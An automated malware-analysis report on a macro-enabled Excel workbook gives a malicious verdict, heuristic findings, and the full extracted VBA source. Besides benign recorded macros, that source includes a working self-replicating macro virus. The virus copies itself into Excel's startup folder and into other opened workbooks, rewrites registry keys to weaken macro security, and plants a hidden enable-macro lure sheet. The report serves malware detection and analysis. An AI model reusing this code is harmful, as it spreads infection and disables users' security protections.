MALICIOUS
484
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
T1087.001 Account Discovery
The file is an Excel 4.0 macro-enabled workbook that uses an 'enable-content' lure, a common technique for malware droppers. The presence of critical heuristics like OLE_XLM_AUTOOPEN_PAYLOAD_LURE and OLE_VBA_SHELL, along with WScript.Shell usage, indicates the macro is designed to execute commands. The Workbook_open subroutine in the VBA script attempts to add a reference and then calls 'Do_What', suggesting it's intended to download and execute a secondary payload.
Heuristics 13
-
XLM Auto_Open workbook with payload URL or enable-content lure critical OLE_XLM_AUTOOPEN_PAYLOAD_LUREWorkbook contains an Excel 4.0 macro sheet with Auto_Open / Auto_Close and also exposes a payload URL or enable-content lure in the OLE bytes. This combination is a high-confidence XLM downloader/social-engineering pattern even when formula recovery cannot decode the full macro chain.
-
Excel 4.0 (XLM) Auto_Open + macro sheet critical OLE_XLM_AUTOOPENWorkbook contains an Auto_Open / Auto_Close defined name together with an Excel 4.0 macro sheet — the canonical XLM auto-execution shape used by malware families such as Emotet and QakBot.
-
VBA macros detected medium 8 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
shell Environ$("comspec") & " /c attrib -S -h """ & Application.StartupPath & "\echo.XLS""", vbMinimizedFocus -
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set oWshell = CreateObject("WScript.Shell") -
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
.InsertLines 1, "Public WithEvents xx As Application" -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Fso = CreateObject("scRiPTinG.fiLEsysTeMoBjEcT") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_open() -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Private Sub Auto_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
FName = Environ("Temp") & "\" & ModuleName & ".bas" -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18183 bytes |
SHA-256: 20285065acc91621e833ad67fcedff408f15c51d6b5e256d2b85b69c058b82fa |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Sheet28"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public WithEvents xx As Application
Attribute xx.VB_VarHelpID = -1
Private Sub Workbook_open()
Set xx = Application
On Error Resume Next
Application.DisplayAlerts = False
Call Do_What
End Sub
Private Sub xx_workbookOpen(ByVal wb As Workbook)
On Error Resume Next
wb.VBProject.References.AddFromGuid _
GUID:="{0002E157-0000-0000-C000-000000000046}", _
Major:=5, Minor:=3
Application.ScreenUpdating = False
Application.DisplayAlerts = False
CopyStart wb
Application.ScreenUpdating = True
End Sub
Attribute VB_Name = "模块4"
Sub 上会()
Attribute 上会.VB_Description = "李国栋 记录的宏 2008-7-28"
Attribute 上会.VB_ProcData.VB_Invoke_Func = " \n14"
'
' 上会 Macro
' 李国栋 记录的宏 2008-7-28
'
'
ActiveWindow.SmallScroll Down:=9
Rows("51:99").Select
Range("A99").Activate
Selection.EntireRow.Hidden = False
ActiveWindow.SmallScroll Down:=-27
Range("B2:W63").Select
Range("E63").Activate
ActiveSheet.PageSetup.PrintArea = "$B$2:$W$63"
ActiveWindow.SmallScroll Down:=-12
Range("B43:W43").Select
ActiveWindow.SmallScroll Down:=-12
End Sub
Sub 不上会()
Attribute 不上会.VB_Description = "李国栋 记录的宏 2008-7-28"
Attribute 不上会.VB_ProcData.VB_Invoke_Func = " \n14"
'
' 不上会 Macro
' 李国栋 记录的宏 2008-7-28
'
'
ActiveWindow.SmallScroll Down:=45
Rows("52:98").Select
Range("A98").Activate
Selection.EntireRow.Hidden = True
ActiveWindow.SmallScroll Down:=-18
Range("B2:W107").Select
Range("E107").Activate
ActiveSheet.PageSetup.PrintArea = "$B$2:$W$107"
Range("E48:K49").Select
ActiveWindow.SmallScroll Down:=-15
End Sub
Attribute VB_Name = "模块3"
Sub 事业类4()
Attribute 事业类4.VB_Description = "李国栋 记录的宏 2008-7-28"
Attribute 事业类4.VB_ProcData.VB_Invoke_Func = " \n14"
'
' 事业类4 Macro
' 李国栋 记录的宏 2008-7-28
'
'
Range("A2").Select
ActiveCell.FormulaR1C1 = "1"
Range("B3").Select
End Sub
Sub 非事业4()
Attribute 非事业4.VB_Description = "李国栋 记录的宏 2008-7-28"
Attribute 非事业4.VB_ProcData.VB_Invoke_Func = " \n14"
'
' 非事业4 Macro
' 李国栋 记录的宏 2008-7-28
'
'
Range("A2").Select
ActiveCell.FormulaR1C1 = "0"
Range("B4:C4").Select
End Sub
Attribute VB_Name = "模块1"
Sub 复制转换1()
Attribute 复制转换1.VB_Description = "李国栋 记录的宏 2008-7-25"
Attribute 复制转换1.VB_ProcData.VB_Invoke_Func = " \n14"
'
' 复制转换1 Macro
' 李国栋 记录的宏 2008-7-25
'
'
ActiveWindow.SmallScroll Down:=-6
Range("F19:W20").Select
ActiveCell.FormulaR1C1 = "=RC[20]"
Selection.Copy
Selection.PasteSpecial Paste:=xlPasteValues, Operation:=xlNone, SkipBlanks _
:=False, Transpose:=False
End Sub
Sub 转换3()
Attribute 转换3.VB_Description = "李国栋 记录的宏 2008-7-25"
Attribute 转换3.VB_ProcData.VB_Invoke_Func = " \n14"
'
' 转换3 Macro
' 李国栋 记录的宏 2008-7-25
'
'
Range("B35:W35").Select
Application.CutCopyMode = False
ActiveCell.FormulaR1C1 = "=RC[24]"
Selection.Copy
Selection.PasteSpecial Paste:=xlPasteValues, Operation:=xlNone, SkipBlanks _
:=False, Transpose:=False
End Sub
Attribute VB_Name = "模块2"
Sub 转换4()
Attribute 转换4.VB_Description = "李国栋 记录的宏 2008-7-25"
Attribute 转换4.VB_ProcData.VB_Invoke_Func = " \n14"
'
' 转换4 Macro
' 李国栋 记录的宏 2008-7-25
'
'
Range("B36:W36").Select
ActiveCell.FormulaR1C1 = "=RC[24]"
Selection.Copy
Selection.PasteSpecial Paste:=xlPasteValues, Operation:=xlNone, SkipBlanks _
:=False, Transpose:=False
Range("B37:W37").Select
End Sub
Sub 转换5()
Attribute 转换5.VB_Description = "李国栋 记录的宏 2008-7-25"
Attribute 转换5.VB_ProcData.VB_Invoke_Func = " \n14"
'
' 转换5 Macro
' 李国栋 记录的宏 2008-7-25
'
'
Range("B37:W37").Select
Application.CutCopyMode = False
ActiveCell.FormulaR1C1 = "=RC[24]"
Selection.Copy
Selection.PasteSpecial Paste:=xlPasteValues, Operation:=xlNone, SkipBlanks _
:=False, Transpose:=False
End Sub
Sub 转换6()
Attribute 转换6.VB_Description = "李国栋 记录的宏 2008-7-25"
Attribute 转换6.VB_ProcData.VB_Invoke_Func = " \n14"
'
' 转换6 Macro
' 李国栋 记录的宏 2008-7-25
'
'
Range("B38:W38").Select
Application.CutCopyMode = False
ActiveCell.FormulaR1C1 = "=RC[24]"
Selection.Copy
Selection.PasteSpecial Paste:=xlPasteValues, Operation:=xlNone, SkipBlanks _
:=False, Transpose:=False
Range("B39:W39").Select
End Sub
Sub 转换2()
Attribute 转换2.VB_Description = "李国栋 记录的宏 2008-7-25"
Attribute 转换2.VB_ProcData.VB_Invoke_Func = " \n14"
'
' 转换2 Macro
' 李国栋 记录的宏 2008-7-25
'
'
Range("Y23:Y27").Select
ActiveCell.FormulaR1C1 = "=R[-5]C[1]"
Selection.Copy
Selection.PasteSpecial Paste:=xlPasteValues, Operation:=xlNone, SkipBlanks _
:=False, Transpose:=False
Range("Y28:Y32").Select
Application.CutCopyMode = False
ActiveCell.FormulaR1C1 = "=R[-10]C[2]"
Selection.Copy
Selection.PasteSpecial Paste:=xlPasteValues, Operation:=xlNone, SkipBlanks _
:=False, Transpose:=False
Range("Y23:Y32").Select
Selection.Font.ColorIndex = 0
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "模块5"
Sub 特评授信()
Attribute 特评授信.VB_Description = "宏由 李国栋 录制,时间: 2008-10-15"
Attribute 特评授信.VB_ProcData.VB_Invoke_Func = " \n14"
'
' 特评授信 Macro
' 宏由 李国栋 录制,时间: 2008-10-15
'
'
Range("D39:E42").Select
ActiveCell.FormulaR1C1 = "=R[10]C[12]"
Range("M55:O55").Select
End Sub
Sub 正常授信()
Attribute 正常授信.VB_Description = "宏由 李国栋 录制,时间: 2008-10-15"
Attribute 正常授信.VB_ProcData.VB_Invoke_Func = " \n14"
'
' 正常授信 Macro
' 宏由 李国栋 录制,时间: 2008-10-15
'
'
Range("D39:E42").Select
ActiveCell.FormulaR1C1 = "=R[4]C[17]"
Range("M55:O55").Select
End Sub
Attribute VB_Name = "Sheet19"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "echo"
Private Sub Auto_Open()
Application.DisplayAlerts = False
If ThisWorkbook.Path <> Application.StartupPath Then
Application.ScreenUpdating = False
Call Delete_This_WK
Call CopyToWorkBook
If Sheets(1).Name <> "Macro1" Then MoveMacro4 ThisWorkbook
ThisWorkbook.Save
Application.ScreenUpdating = True
End If
End Sub
Private Sub CopyToWorkBook()
Const DQUOTE = """"
With ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
.InsertLines 1, "Public WithEvents xx As Application"
.InsertLines 2, "Private Sub Workbook_open()"
.InsertLines 3, "Set xx = Application"
.InsertLines 4, "On Error Resume Next"
.InsertLines 5, "Application.DisplayAlerts = False"
.InsertLines 6, "Call Do_What"
.InsertLines 7, "End Sub"
.InsertLines 8, "Private Sub xx_workbookOpen(ByVal wb As Workbook)"
.InsertLines 9, "On Error Resume Next"
.InsertLines 10, "wb.VBProject.References.AddFromGuid _"
.InsertLines 11, "GUID:=" & DQUOTE & "{0002E157-0000-0000-C000-000000000046}" & DQUOTE & ", _"
.InsertLines 12, "Major:=5, Minor:=3"
.InsertLines 13, "Application.ScreenUpdating = False"
.InsertLines 14, "Application.DisplayAlerts = False"
.InsertLines 15, "CopyStart wb"
.InsertLines 16, "Application.ScreenUpdating = True"
.InsertLines 17, "End Sub"
End With
End Sub
Private Sub Delete_This_WK()
Dim VBProj As VBIDE.VBProject
Dim VBComp As VBIDE.VBComponent
Dim CodeMod As VBIDE.CodeModule
Set VBProj = ThisWorkbook.VBProject
Set VBComp = VBProj.VBComponents("ThisWorkbook")
Set CodeMod = VBComp.CodeModule
With CodeMod
.DeleteLines 1, .CountOfLines
End With
End Sub
Function Do_What()
Attribute Do_What.VB_ProcData.VB_Invoke_Func = " \n14"
If ThisWorkbook.Path <> Application.StartupPath Then
RestoreAfterOpen
Call OpenDoor
Call Microsofthobby
Call Hacking
End If
End Function
Function CopyStart(ByVal wb As Workbook)
Attribute CopyStart.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
Dim VBProj1 As VBIDE.VBProject
Dim VBProj2 As VBIDE.VBProject
Set VBProj1 = Workbooks("echo.xls").VBProject
Set VBProj2 = wb.VBProject
If CopyModule("echo", VBProj1, VBProj2, False) Then Exit Function
End Function
Function CopyModule(ModuleName As String, _
FromVBProject As VBIDE.VBProject, _
ToVBProject As VBIDE.VBProject, _
OverwriteExisting As Boolean) As Boolean
Attribute CopyModule.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
Dim VBComp As VBIDE.VBComponent
Dim FName As String
Dim CompName As String
Dim S As String
Dim SlashPos As Long
Dim ExtPos As Long
Dim TempVBComp As VBIDE.VBComponent
If FromVBProject Is Nothing Then
CopyModule = False
Exit Function
End If
If Trim(ModuleName) = vbNullString Then
CopyModule = False
Exit Function
End If
If ToVBProject Is Nothing Then
CopyModule = False
Exit Function
End If
If FromVBProject.Protection = vbext_pp_locked Then
CopyModule = False
Exit Function
End If
If ToVBProject.Protection = vbext_pp_locked Then
CopyModule = False
Exit Function
End If
On Error Resume Next
Set VBComp = FromVBProject.VBComponents(ModuleName)
If Err.Number <> 0 Then
CopyModule = False
Exit Function
End If
FName = Environ("Temp") & "\" & ModuleName & ".bas"
If OverwriteExisting = True Then
If Dir(FName, vbNormal + vbHidden + vbSystem) <> vbNullString Then
Err.Clear
Kill FName
If Err.Number <> 0 Then
CopyModule = False
Exit Function
End If
End If
With ToVBProject.VBComponents
.Remove .Item(ModuleName)
End With
Else
Err.Clear
Set VBComp = ToVBProject.VBComponents(ModuleName)
If Err.Number <> 0 Then
If Err.Number = 9 Then
Else
CopyModule = False
Exit Function
End If
End If
End If
FromVBProject.VBComponents(ModuleName).Export FileName:=FName
SlashPos = InStrRev(FName, "\")
ExtPos = InStrRev(FName, ".")
CompName = Mid(FName, SlashPos + 1, ExtPos - SlashPos - 1)
Set VBComp = Nothing
Set VBComp = ToVBProject.VBComponents(CompName)
If VBComp Is Nothing Then
ToVBProject.VBComponents.Import FileName:=FName
Else
If VBComp.Type = vbext_ct_Document Then
Set TempVBComp = ToVBProject.VBComponents.Import(FName)
With VBComp.CodeModule
.DeleteLines 1, .CountOfLines
S = TempVBComp.CodeModule.Lines(1, TempVBComp.CodeModule.CountOfLines)
.InsertLines 1, S
End With
On Error GoTo 0
ToVBProject.VBComponents.Remove TempVBComp
End If
End If
Kill FName
CopyModule = True
End Function
Function Microsofthobby()
Attribute Microsofthobby.VB_ProcData.VB_Invoke_Func = " \n14"
Dim myfile0 As String
Dim MyFile As String
On Error Resume Next
myfile0 = ThisWorkbook.FullName
MyFile = Application.StartupPath & "\echo.xls"
If WorkbookOpen("echo.xls") And ThisWorkbook.Path <> Application.StartupPath Then Workbooks("echo.xls").Close False
shell Environ$("comspec") & " /c attrib -S -h """ & Application.StartupPath & "\echo.XLS""", vbMinimizedFocus
shell Environ$("comspec") & " /c Del /F /Q """ & Application.StartupPath & "\echo.XLS""", vbMinimizedFocus
shell Environ$("comspec") & " /c RD /S /Q """ & Application.StartupPath & "\echo.XLS""", vbMinimizedFocus
If ThisWorkbook.Path <> Application.StartupPath Then
Application.ScreenUpdating = False
ThisWorkbook.IsAddin = True
ThisWorkbook.SaveCopyAs MyFile
ThisWorkbook.IsAddin = False
Application.ScreenUpdating = True
End If
End Function
Function OpenDoor()
Attribute OpenDoor.VB_ProcData.VB_Invoke_Func = " \n14"
Dim Fso, RK1 As String, RK2 As String, RK3 As String, RK4 As String
Dim KValue1 As Variant, KValue2 As Variant
Dim VS As String
On Error Resume Next
VS = Application.Version
Set Fso = CreateObject("scRiPTinG.fiLEsysTeMoBjEcT")
RK1 = "HKEY_CURRENT_USER\Software\Microsoft\Office\" & VS & "\Excel\Security\AccessVBOM"
RK2 = "HKEY_CURRENT_USER\Software\Microsoft\Office\" & VS & "\Excel\Security\Level"
RK3 = "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\" & VS & "\Excel\Security\AccessVBOM"
RK4 = "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\" & VS & "\Excel\Security\Level"
KValue1 = 1
KValue2 = 1
Call WReg(RK1, KValue1, "REG_DWORD")
Call WReg(RK2, KValue2, "REG_DWORD")
Call WReg(RK3, KValue1, "REG_DWORD")
Call WReg(RK4, KValue2, "REG_DWORD")
End Function
Sub WReg(strkey As String, Value As Variant, ValueType As String)
Attribute WReg.VB_ProcData.VB_Invoke_Func = " \n14"
Dim oWshell
Set oWshell = CreateObject("WScript.Shell")
If ValueType = "" Then
oWshell.RegWrite strkey, Value
Else
oWshell.RegWrite strkey, Value, ValueType
End If
Set oWshell = Nothing
End Sub
Private Sub MoveMacro4(ByVal wb As Workbook)
On Error Resume Next
Dim sht As Object
wb.Sheets(1).Select
Sheets.Add Type:=xlExcel4MacroSheet
ActiveSheet.Name = "Macro1"
Range("A2").Select
ActiveCell.FormulaR1C1 = "=ERROR(FALSE)"
Range("A3").Select
ActiveCell.FormulaR1C1 = "=IF(ERROR.TYPE(RUN(""" & Application.UserName & """))=4)"
Range("A4").Select
ActiveCell.FormulaR1C1 = "=ALERT(""禁用宏,关闭 " & Chr(10) & Now & Chr(10) & "Please Enable Macro!"",3)"
Range("A5").Select
ActiveCell.FormulaR1C1 = "=FILE.CLOSE(FALSE)"
Range("A6").Select
ActiveCell.FormulaR1C1 = "=END.IF()"
Range("A7").Select
ActiveCell.FormulaR1C1 = "=RETURN()"
For Each sht In wb.Sheets
wb.Names.Add sht.Name & "!Auto_Activate", "=Macro1!$A$2", False
Next
wb.Excel4MacroSheets(1).Visible = xlSheetVeryHidden
End Sub
Private Function WorkbookOpen(WorkBookName As String) As Boolean
WorkbookOpen = False
On Error GoTo WorkBookNotOpen
If Len(Application.Workbooks(WorkBookName).Name) > 0 Then
WorkbookOpen = True
Exit Function
End If
WorkBookNotOpen:
End Function
Private Function RestoreAfterOpen()
Dim sht, del_sht, rng, del_frag As Boolean
On Error Resume Next
del_sht = ActiveSheet.Name
Application.ScreenUpdating = False
Application.DisplayAlerts = False
For Each sht In ThisWorkbook.Sheets
If sht.Name <> "Macro1" Then sht.Visible = xlSheetVisible
Next
For Each rng In Sheets(del_sht).Range("A1:F15")
If InStr(rng.Value, "CONFIDENTIAL") > 0 Then
del_frag = True
Exit For
End If
Next
If del_frag = True Then Sheets(del_sht).Delete
Application.ScreenUpdating = True
End Function
Private Sub Hacking()
'this's hacking code
shell "explorer tencent://message/?uin=654486740"
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.